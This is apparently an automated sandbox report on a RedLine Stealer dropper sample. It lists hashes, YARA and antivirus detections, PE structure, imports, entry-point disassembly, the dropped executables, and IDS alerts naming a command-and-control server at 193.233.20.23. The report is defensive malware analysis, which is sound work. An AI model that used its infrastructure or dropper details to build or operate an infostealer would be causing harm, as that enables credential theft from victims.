                                                                                                                                                                                                      MD5:378ED88EBDB06E622FEB565D682E26F3
                                                                                                                                                                                                      SHA1:E31E193FE697949D39AA2C29A1FED0B32509175F
                                                                                                                                                                                                      SHA-256:1F3F46EDCE2F5C311567B5358B6FC8AD908B1358896CE31D3A00478DB65E179E
                                                                                                                                                                                                      SHA-512:E752098407B49DE79C20BED58FA3190D976B5D31287414AAAEA3E06472AA9E15C2A07117600DA3C86189E01E7851576E6F0124A52334F3A2E8BF804AFFB2CDEA
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, Author: Joe Security
                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rWE40pD80.exe, Author: ditekSHen
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 74%
• Antivirus: Virustotal, Detection: 68%
                                                                                                                                                                                                      Process:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):982016
                                                                                                                                                                                                      Entropy (8bit):7.922315449972201
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:KMrhy90ipV+f8Va9PHpAYKs9bRdoXO5LFxmpAFosOhk9NfKBUBzE9hxIs1baf5e6:fyBVaZprL6XO5LbmpAh0UBwUsk5e6
                                                                                                                                                                                                      MD5:43AC4F54070D2E111D56AF37CF9C2765
                                                                                                                                                                                                      SHA1:0F847A85EE22627DA0B24F590F054C4F6F8F3EFC
                                                                                                                                                                                                      SHA-256:1A2CFEA88AA9CAA8C328E862897F899E264557E7EA4516051C790483D2758F8C
                                                                                                                                                                                                      SHA-512:09CCC10213300C4C286CA397B34E0F3734C5271AF641B1AB078B9D80308FF2A419B3C22688026C1D29D7BF0568434D87CD784D0DD9B72E99B1E7971B66FF547A
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 62%
• Antivirus: Virustotal, Detection: 54%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):319488
                                                                                                                                                                                                      Entropy (8bit):7.462173497992741
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:y/ae4GLByOGZEnuPi1dFv+q8C3Rm/x/m+zLVEConBlpVjlEXecC9BUqLfQ1Hvr:6aiLoO7dF34VmS98BlFAerI
                                                                                                                                                                                                      MD5:1DC889EA2A05C7C4D829060CABE98814
                                                                                                                                                                                                      SHA1:4A9314FAF85B3A0EB4B649A7A0B9E8B519E20ADB
                                                                                                                                                                                                      SHA-256:577AF1002754AEB104A8EADE2F2A011C6A0FC75F8F8E87AB51BFBBD892BE151D
                                                                                                                                                                                                      SHA-512:71B3F7AD2B74ECE2A96869F5CEBC7BE8B5D47F8FAC7ABCA269864F8190755DAB705090067E032402F8F9A283D5D022D25D80D373177E0F28460C716508E0AD89
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 44%
• Antivirus: Virustotal, Detection: 51%
                                                                                                                                                                                                      Joe Sandbox View:
• Filename: Qt5NzBQSp3.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):698368
                                                                                                                                                                                                      Entropy (8bit):7.871406128669399
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12288:mMrWy90/O6Fcx4EbRhWX15ei4m5Ago/H/k3KVLX/B6As:Ey8OU2YX15etm5AFd/BS
                                                                                                                                                                                                      MD5:8906052E48565395A2A7E5B0D6584C7E
                                                                                                                                                                                                      SHA1:9D0868DFE86682D7E7DBE698A09221CA1FF6EB69
                                                                                                                                                                                                      SHA-256:23EFB6F716921B209CA4584691B8C5A83BDFC1ED5B0D6DFC3CF5C63E253CE8B0
                                                                                                                                                                                                      SHA-512:BB336038DF65A9D1554AE0019558B2B70F6A781B4E60AD7FA2F795782F6BEE0F22590D817B26725ED6AAF25944A9FB982ED18B0DE3BEB01EDE506D76B2E4D4AD
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):260608
                                                                                                                                                                                                      Entropy (8bit):7.266872346954937
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:nxlLnw3emCfISrkCl/dYZVIARBalBBNwfg:nfj6ezrkClo/Bimf
                                                                                                                                                                                                      MD5:716F45CB193505F1726FA1074BAEC9A5
                                                                                                                                                                                                      SHA1:0FEBBE50F23CEF22709D9503C2BC31717D11445F
                                                                                                                                                                                                      SHA-256:3910C9E8B4D94155A5255FAD93837888C0BF91EA24EE74B9D9841F4EBDD8CD03
                                                                                                                                                                                                      SHA-512:15620D78E4FC7AE5D560D80F4BED0EDC7D370012A42CA380CE6F482D506C85BB1CE43FE114E8AE1D0B9D0B7761F6C83BF4FF28BFDA765D3ACA6E78776236AE47
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):409088
                                                                                                                                                                                                      Entropy (8bit):7.71693047560672
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6144:Kpy+bnr+7p0yN90QECr7NC+TaVDUpBVFmS98BYlAoKJhtRg8bkZU:LMrjy90orIQpBbmUAnoAF/
                                                                                                                                                                                                      MD5:64653075A4A9CF43333AE22B968159AB
                                                                                                                                                                                                      SHA1:4E2EB552ABDE0014FD2B340A85150A1B59B70DEF
                                                                                                                                                                                                      SHA-256:5D201D551C244FC716E8131CFE7B38ADFA6925367A5EF9D744483F05D72F288B
                                                                                                                                                                                                      SHA-512:CBA90570CFC0234452408BE1D8EB67AA7EC3BB6202BB710A5BE7E5D6DDB7A533371EA6C1858EB7300A6B903B0B66450F73C480367EF613C1B687AD6A41AA9CC7
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):11713
                                                                                                                                                                                                      Entropy (8bit):4.832235212694193
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                      MD5:CA6D279F0C8A205BFA0F8878D8F7BA2A
                                                                                                                                                                                                      SHA1:EB1308069E84907580A742944DF2E72CCA4ED942
                                                                                                                                                                                                      SHA-256:1AEC5284DD228F2DEC7EB05BAABAD433131CD164C25E53875511B8297DEE0FF4
                                                                                                                                                                                                      SHA-512:10331D83EFFD5A03C16CC5526204849EF458ECE2D1C7D7D1744315E0D8874853DCA301172541B4F4C7A5235678C53979FC832FB59A3E6D9ECCA7522F72E652B7
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):319488
                                                                                                                                                                                                      Entropy (8bit):7.462173497992741
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3072:y/ae4GLByOGZEnuPi1dFv+q8C3Rm/x/m+zLVEConBlpVjlEXecC9BUqLfQ1Hvr:6aiLoO7dF34VmS98BlFAerI
                                                                                                                                                                                                      MD5:1DC889EA2A05C7C4D829060CABE98814
                                                                                                                                                                                                      SHA1:4A9314FAF85B3A0EB4B649A7A0B9E8B519E20ADB
                                                                                                                                                                                                      SHA-256:577AF1002754AEB104A8EADE2F2A011C6A0FC75F8F8E87AB51BFBBD892BE151D
                                                                                                                                                                                                      SHA-512:71B3F7AD2B74ECE2A96869F5CEBC7BE8B5D47F8FAC7ABCA269864F8190755DAB705090067E032402F8F9A283D5D022D25D80D373177E0F28460C716508E0AD89
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                      Entropy (8bit):7.936745878901933
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                      File name:iOqzwbUlln.exe
                                                                                                                                                                                                      File size:1129984
                                                                                                                                                                                                      MD5:fc3e0027ffead1129accedcb4814e96f
                                                                                                                                                                                                      SHA1:e4c0e5996cb68ef0a79648a6c01e9f0c906986db
                                                                                                                                                                                                      SHA256:fdb606c65f84e10b023a3c77a553791291373175953f5c2e98134ebb623d64d1
                                                                                                                                                                                                      SHA512:1f29a3d19cb0e065123f028632034c90cf71f108909e5b05c8631bfbfe4600e89931565d7cf2d4f8836f7e25ee921b369dd610cb10b351d5d9baa09387a3d2e5
                                                                                                                                                                                                      SSDEEP:24576:GyEuEGYnpYUZ/rDqZDeXO5hdmWAzrrBfnL:VpZYnt/SR5hgdPt
                                                                                                                                                                                                      TLSH:95352307FBFC4476D865477048B906D30A36FE112B7E429F324EAE9A08726245736BDB
                                                                                                                                                                                                      Icon Hash:f8e0e4e8ecccc870
                                                                                                                                                                                                      Entrypoint:0x406a60
                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                      Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                      OS Version Major:10
                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                      File Version Major:10
                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                      Subsystem Version Major:10
                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                      Import Hash:646167cce332c1c252cdcb1839e0cf48
                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                      call 00007F8B4C6D5925h
                                                                                                                                                                                                      jmp 00007F8B4C6D5235h
                                                                                                                                                                                                      push 00000058h
                                                                                                                                                                                                      push 004072B8h
                                                                                                                                                                                                      call 00007F8B4C6D59C7h
                                                                                                                                                                                                      xor ebx, ebx
                                                                                                                                                                                                      mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                      lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F8B4C6D524Ah
cmp eax, esi
jne 00007F8B4C6D5239h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F8B4C6D5242h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F8B4C6D5209h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F8B4C6D523Ch
push 0000001Fh
call 00007F8B4C6D575Bh
pop ecx
jmp 00007F8B4C6D526Ch
cmp dword ptr [004088B0h], ebx
jne 00007F8B4C6D525Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F8B4C6D5386h
pop ecx
pop ecx
test eax, eax
je 00007F8B4C6D5249h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007F8B4C6D5369h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007F8B4C6D524Dh
push 004010B4h
push 004010ACh
call 00007F8B4C6D5915h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x10b7c4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x118000 | 0x888 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .rsrc | 0xc000 | 0x10c000 | 0x10b800 | False | 0.9654159973714953 | data | 7.954331200269156 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x118000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States |
| RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States |
| RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States |
| RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States |
| RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States |
| RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States |
| RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States |
| RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States |
| RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States |
| RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
| RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States |
| RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States |
| RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States |
| RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States |
| RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States |
| RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia |
| RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States |
| RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia |
| RT_DIALOG | 0x250f4 | 0x166 | data | English | United States |
| RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia |
| RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States |
| RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia |
| RT_DIALOG | 0x25764 | 0x130 | data | English | United States |
| RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia |
| RT_DIALOG | 0x259e4 | 0x120 | data | English | United States |
| RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia |
| RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States |
| RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia |
| RT_STRING | 0x25d3c | 0x520 | data | English | United States |
| RT_STRING | 0x2625c | 0x52e | data | Russian | Russia |
| RT_STRING | 0x2678c | 0x5cc | data | English | United States |
| RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia |
| RT_STRING | 0x272ec | 0x4b0 | data | English | United States |
| RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia |
| RT_STRING | 0x27c50 | 0x44a | data | English | United States |
| RT_STRING | 0x2809c | 0x43e | data | Russian | Russia |
| RT_STRING | 0x284dc | 0x3ce | data | English | United States |
| RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia |
| RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x28bb0 | 0xedae0 | Microsoft Cabinet archive data, many, 973536 bytes, 2 files, at 0x2c +A "szV94FU13.exe" +A "rWE40pD80.exe", ID 2077, number 1, 36 datablocks, 0x1503 compression | English | United States |
| RT_RCDATA | 0x116690 | 0x4 | data | English | United States |
| RT_RCDATA | 0x116694 | 0x24 | data | English | United States |
| RT_RCDATA | 0x1166b8 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x1166c0 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x1166c8 | 0x4 | data | English | United States |
| RT_RCDATA | 0x1166cc | 0xe | data | English | United States |
| RT_RCDATA | 0x1166dc | 0x4 | data | English | United States |
| RT_RCDATA | 0x1166e0 | 0xe | data | English | United States |
| RT_RCDATA | 0x1166f0 | 0x4 | data | English | United States |
| RT_RCDATA | 0x1166f4 | 0x5 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x1166fc | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_RCDATA | 0x116704 | 0x7 | ASCII text, with no line terminators | English | United States |
| RT_GROUP_ICON | 0x11670c | 0xbc | data | English | United States |
| RT_VERSION | 0x1167c8 | 0x408 | data | English | United States |
| RT_VERSION | 0x116bd0 | 0x410 | data | Russian | Russia |
| RT_MANIFEST | 0x116fe0 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States |

| DLL | Import |
|---|---|
| ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges |
| KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA |
| GDI32.dll | GetDeviceCaps |
| USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics |
| msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset |
| COMCTL32.dll | |
| Cabinet.dll | |
| VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA |
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/27/23-11:39:10.429997 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4123 | 49695 | 193.233.20.23 | 192.168.2.4
02/27/23-11:39:21.135506 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49695 | 4123 | 192.168.2.4 | 193.233.20.23
02/27/23-11:39:08.913244 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49695 | 4123 | 192.168.2.4 | 193.233.20.23


                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:11:38:40
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\iOqzwbUlln.exe
                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                      File size:1129984 bytes
                                                                                                                                                                                                      MD5 hash:FC3E0027FFEAD1129ACCEDCB4814E96F
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:11:38:40
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\szV94FU13.exe
                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                      File size:982016 bytes
                                                                                                                                                                                                      MD5 hash:43AC4F54070D2E111D56AF37CF9C2765
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 62%, ReversingLabs
                                                                                                                                                                                                      • Detection: 54%, Virustotal
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:11:38:41
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\stL82bL52.exe
                                                                                                                                                                                                      Imagebase:0x1f0000
                                                                                                                                                                                                      File size:698368 bytes
                                                                                                                                                                                                      MD5 hash:8906052E48565395A2A7E5B0D6584C7E
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                      • Detection: 59%, ReversingLabs
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                      Start time:11:38:42
                                                                                                                                                                                                      Start date:27/02/2023
                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\sQm37qN82.exe
                                                                                                                                                                                                      Imagebase:0xde0000
                                                                                                                                                                                                      File size:409088 bytes
                                                                                                                                                                                                      MD5 hash:64653075A4A9CF43333AE22B968159AB
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Antivirus matches:
